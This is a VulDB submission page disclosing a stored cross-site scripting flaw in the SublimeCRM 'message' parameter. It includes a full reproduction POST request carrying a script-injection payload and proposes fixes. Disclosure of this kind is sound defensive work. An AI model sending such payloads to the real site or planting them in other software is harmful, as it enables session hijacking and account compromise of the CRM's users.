Soumettre #496469: Internet Web Solutions Sublime CRM N/A Cross Site Scriptinginformation

TitreInternet Web Solutions Sublime CRM N/A Cross Site Scripting
DescriptionVulnerability description: **SublimeCRM**, a **Customer Relationship Management (CRM) platform**, contains a **Stored Cross-Site Scripting (XSS) vulnerability** in the `/crm/inicio.php` endpoint. The **vulnerable parameter is `message`**, which is used when a user **posts a new message on the public board**. The CRM does not properly sanitize user input, allowing authenticated attackers to inject **persistent** JavaScript payloads. Once the malicious XSS payload is stored in a new message, **it will automatically execute for any user as soon as they log into their account**, leading to **account compromise or unauthorized actions**. Steps to reproduce: 1. **Log in** to the SublimeCRM platform at `https://www.sublimecrm.com/crm/inicio.php`. 2. Send the following **malicious POST request** to create a new message: ``` POST /crm/inicio.php HTTP/2 Host: www.sublimecrm.com Cookie: crm_iws=qp9ptvgov90d2s5q6dkn43phq7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0 Content-Type: application/x-www-form-urlencoded Content-Length: 226 Origin: https://www.sublimecrm.com Referer: https://www.sublimecrm.com/crm/inicio.php pagina=1&orderby=time&orderby_dir=DESC&unique_edit_id=140&id=(Nuevo)&deleted=&msg_from=8&msg_to=0&message="><script>alert(1)</script>&time=&cliente_crm=1&details=0&edit=0&submit_element=1&delete_element=0 ``` 3. Submit the request. 4. Any **user who logs into the CRM will immediately trigger the stored JavaScript code**, executing it without any additional interaction. Proposed solution: - **Sanitize input**: Properly encode user input in the `message` parameter before storing it. - **Escape output**: Ensure stored content is encoded properly before being rendered in the CRM interface. - **Use Content Security Policy (CSP)**: Implement a **strict CSP** to block unauthorized script execution. References: https://owasp.org/www-community/attacks/xss/
Utilisateur
 6h4ack (UID 81245)
Soumission07/02/2025 08:57 (il y a 1 Année)
Modérer15/02/2025 16:44 (8 days later)
StatutAccepté
Entrée VulDB295968 [Internet Web Solutions Sublime CRM jusqu’à 20250207 HTTP POST Request /crm/inicio.php msg_to cross site scripting]
Points17

PrécédentAperçuSuivant

Want to know what is going to be exploited?

We predict KEV entries!